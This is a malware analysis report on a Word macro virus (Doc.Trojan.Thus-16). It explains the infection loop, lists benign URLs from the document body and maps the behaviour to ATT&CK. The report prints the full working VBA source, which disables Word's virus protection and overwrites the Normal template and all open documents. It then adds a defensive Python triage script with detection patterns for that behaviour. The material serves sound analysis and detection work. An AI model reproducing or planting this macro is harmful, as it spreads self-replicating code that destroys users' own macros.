Malware Insights
The sample carries a VBA project whose Document_Open handler (also called from Document_New) runs automatically whenever the document is opened or a new document is created from the template, which maps to T1059.005 (Command and Scripting Interpreter: Visual Basic). The recovered macro code is the main evidence of intent. It sets Application.Options.VirusProtection = False to suppress Word's macro warning, checks whether line 3 of the Normal template's first code module carries the marker comment 'Mat1', wipes and replaces that module with its own code if it does not, saves the template, and then runs the same replace-if-unmarked routine against every open document. That is the infection loop of a self-replicating Word macro virus rather than a downloader or dropper, and it is consistent with the ClamAV name Doc.Trojan.Thus-16. A Win32 ExitWindowsEx import is declared but never called anywhere in the recovered module. Note that the loop depends on programmatic access to the VBA project; current Office builds refuse that access unless "Trust access to the VBA project object model" has been enabled, and the On Error Resume Next at the top of the handler hides the resulting failures. Two social-engineering heuristics (callback phone lure, urgency language) also fired on the document text; they are rule matches on wording and are not corroborated by the macro, which contains no phone number, URL or payload. The URLs extracted from the OLE body are listed for context and none of them is a detection. Delivery as a Spearphishing Attachment (T1566.001) is a reasonable default assumption for any macro-bearing document, but the behaviour here points to spread through an infected Normal template on an already compromised Word installation.
Heuristics (6)

- ClamAV: Doc.Trojan.Thus-16 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Thus-16.
- VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding). Document contains VBA macro code.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Document_Open macro. Matched lines in script (excerpt, truncated by the analyzer):

  ```vb
  Attribute VB_Name = "ThisDocument"
  Attribute VB_Base = "1Normal.ThisDocument"
  Attribute VB_Creatable = False
  Attribute VB_PredeclaredId = True
  Attribute VB_Exposed = True
  Attribute VB_TemplateDerived = True
  Attribute VB_Customizable = True
  Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
  Private Sub Document_Open()
  'Mat1'
  On Error Resume Next
  Application.Options.VirusProtection = False
  If NormalTemplate.VBProject.VBComponents.I …
  ```

- Callback phishing phone lure (medium, SE_CALLBACK_LURE). Document asks the user to call a phone number in a billing, refund, subscription, fraud or security context, consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
- Urgency / deadline lure (low, SE_URGENCY_LURE). Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.); useful context, but low-signal without other findings.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in the document text (OLE body); none was reached from the macro.
  - http://www.hunterspointcommunity.com/
  - http://illuminatedthread.com/
  - http://illuminatedthread.com
  - http://illuminatedthread.com/stage_1/main_stage_1.html
  - http://europe.theoildrum.com/node/5528
  - http://illuminatedthread.com/default.html
  - http://illuminatedthread.com/stage_2/main_stage_2_part_2.html#blue_room
  - http://illuminatedthread.com/stage_2/main_stage_2_part_3.html#joy_of_infinity
  - http://ranprieur.com/essays/dropoutcrit.html
  - http://illuminatedthread.com/stage_2/about_project/about_project.html
  - http://illuminatedthread.com/stage_3/main_stage_3_part_3.html
  - http://illuminatedthread.com/#watertower_sessions
  - http://www.chicagobreakingnews.com/2010/09/quinn-announces-4-million-grant-to-raze-blues-brothers-mall.html
  - http://chucksphotospot.com/
  - http://www.laforum.org/content/competitions/dead-malls
  - http://www.galleryAD.com
  - http://www.parole.aporee.org
  - http://adamantine.wordpress.com/stuff/quitting-the-paint-factory-by-mark-slouka/
  - http://en.wikipedia.org/wiki/Orange_Crush_interchange
  - http://en.wikipedia.org/wiki/Stalker_%28film%29
  - http://en.wikipedia.org/wiki/Nostalghia
  - http://vimeo.com/3859575
  - http://vimeo.com/3869774
  - http://vimeo.com/4119215
  - http://vimeo.com/4189317
  - http://vimeo.com/6990384
  - http://vimeo.com/6079374
  - http://www.nytimes.com/2009/11/09/opinion/09douthat.html
  - http://cluborlov.blogspot.com/search/label/ruins
  - http://cluborlov.blogspot.com/2009/11/oceans-are-coming-part-ii-living-on.html
  - http://vimeo.com/14095124
  - http://vimeo.com/12091362
  - http://vimeo.com/13123393
  - http://vimeo.com/user674524/videos
  - http://vimeo.com/6987264
  - http://en.wikipedia.org/wiki/Dixie_Square_Mall
  - http://atlasobscura.com/place/dixie-square-mall
  - http://www.flickr.com/photos/mikebrown3506/2398806257/#/photos/mikebrown3506/2398806257/lightbox/
  - http://www.flickr.com/photos/mikebrown3506/2398806019/in/photostream/#/photos/mikebrown3506/2398806019/in/photostream/lightbox/
  - http://www.flickr.com/photos/jordannicolette/2838273999/in/photostream/#/photos/jordannicolette/2838258761/in/photostream/lightbox/
  - http://www.facebook.com/home.php?#!/group.php?gid=37301811510
  - http://en.wikipedia.org/wiki/Ship_naming_and_launching
  - http://www.good.is/post/wasteland-twinning-turns-forgotten-spaces-into-artists-canvases/
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1956 bytes | 9d4cc1797b936f1525d8d629627a88f7ee5da07ae6f7f77f231f81fedcf7de4f |

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
        1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
        (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
            1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
            1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
            (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End If
Next k
End Sub
Private Sub Document_New()
Document_Open
End Sub
```
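The infection routine above lends itself to a simple static check that complements the analyzer's heuristics. The Python below is an added example, not code from the analyzer or from oletools: it applies a small hand-written rule set to the decoded macros.bas listed above (embedded inline with line breaks restored), recovers the sentinel the virus uses to decide whether a module is already infected, verifies that this module itself carries that sentinel, and lists Win32 imports that are declared but never called. Rule IDs, severities and the verdict roll-up are my own choices; olevba ships a far larger keyword table and remains the first tool to reach for in real triage.

```python
"""Static triage of decoded VBA for Word macro-virus self-replication.
Added example, not the analyzer's or oletools' code. Rule IDs, severities and the
verdict roll-up are my own; olevba carries a far larger keyword table for real triage.
"""
from __future__ import annotations
import re

# Decoded macros.bas from the report above (olevba output, line breaks restored).
MACRO_SOURCE = r'''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Document_Open()
'Mat1'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, _
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines _
        1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines _
        (1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Mat1'" Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
            1, Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines _
            1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines _
            (1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End If
Next k
End Sub
Private Sub Document_New()
Document_Open
End Sub'''

# (rule_id, severity, regex applied per logical line, case-insensitive); my own rule set.
RULES = (
    ("AUTOEXEC_DOCOPEN", "low", r"^\s*(?:Private\s+|Public\s+)?Sub\s+Document_(?:Open|New|Close)\b"),
    ("DISABLE_VIRUSPROTECTION", "high", r"Options\.VirusProtection\s*=\s*False"),
    ("NORMAL_TEMPLATE_WRITE", "high", r"NormalTemplate\.VBProject\..*\.(?:InsertLines|DeleteLines|AddFromString)\b"),
    ("OPEN_DOCS_INFECT", "high", r"Application\.Documents\.Item\([^)]*\)\.VBProject\..*\.InsertLines\b"),
    ("WIN32_DECLARE", "medium", r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?Function\s+\w+\s+Lib\s+"[^"]+"'),
    ("ON_ERROR_RESUME_NEXT", "info", r"\bOn\s+Error\s+Resume\s+Next\b"),
)

def logical_lines(src: str) -> list[str]:
    """Join VBA ' _' line continuations so each statement is one searchable line."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src).splitlines()

def scan(src: str) -> list[tuple[str, str, str]]:
    """One (rule_id, severity, first matching statement) per rule that fires, in rule order."""
    lines = logical_lines(src)
    hits = []
    for rule_id, severity, pattern in RULES:
        rx = re.compile(pattern, re.IGNORECASE)
        for ln in lines:
            if rx.search(ln):
                hits.append((rule_id, severity, ln.strip()))
                break
    return hits

def infection_marker(src: str) -> tuple[int, str] | None:
    """The 'already infected' sentinel: (module line number, literal) the code compares against."""
    m = re.search(r'CodeModule\.Lines\((\d+),\s*1\)\s*<>\s*"([^"]*)"', src)
    return (int(m.group(1)), m.group(2)) if m else None

def marker_is_self_consistent(src: str) -> bool:
    """True if this module carries the sentinel on the line it checks, i.e. it is itself an infected copy.
    The VBE CodeModule does not count the Attribute header lines olevba prints, so drop them first."""
    mk = infection_marker(src)
    if mk is None:
        return False
    line_no, literal = mk
    body = [ln for ln in src.splitlines() if not ln.startswith("Attribute ")]
    return len(body) >= line_no and body[line_no - 1].strip() == literal

def unused_declares(src: str) -> list[str]:
    """Win32 functions imported via Declare but never referenced anywhere else in the module."""
    text = "\n".join(logical_lines(src))
    names = re.findall(r"Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\b", text, re.IGNORECASE)
    return [n for n in names if len(re.findall(r"\b%s\b" % re.escape(n), text)) == 1]

def verdict(src: str) -> str:
    """Roll-up: writing into Normal plus copying into open documents is the macro-virus signature."""
    ids = {h[0] for h in scan(src)}
    if {"NORMAL_TEMPLATE_WRITE", "OPEN_DOCS_INFECT"} <= ids:
        return "self-replicating macro virus"
    return "suspicious macro" if ids - {"AUTOEXEC_DOCOPEN", "ON_ERROR_RESUME_NEXT"} else "no macro-virus indicators"
```

marker_is_self_consistent is the check worth keeping in any macro-virus triage: the code looks for 'Mat1' at module line 3, and once the Attribute header lines (which the VBE does not count) are stripped, line 3 of this very module is 'Mat1', so the carved file is an infected copy rather than a dropper that plants the virus elsewhere. unused_declares surfaces the ExitWindowsEx import that nothing in the recovered module calls, which is the kind of leftover that distinguishes a long-circulating sample from freshly authored code.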